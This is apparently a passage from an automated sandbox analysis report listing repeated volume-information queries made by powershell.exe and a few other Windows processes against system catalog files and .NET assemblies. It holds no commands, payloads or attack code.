                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
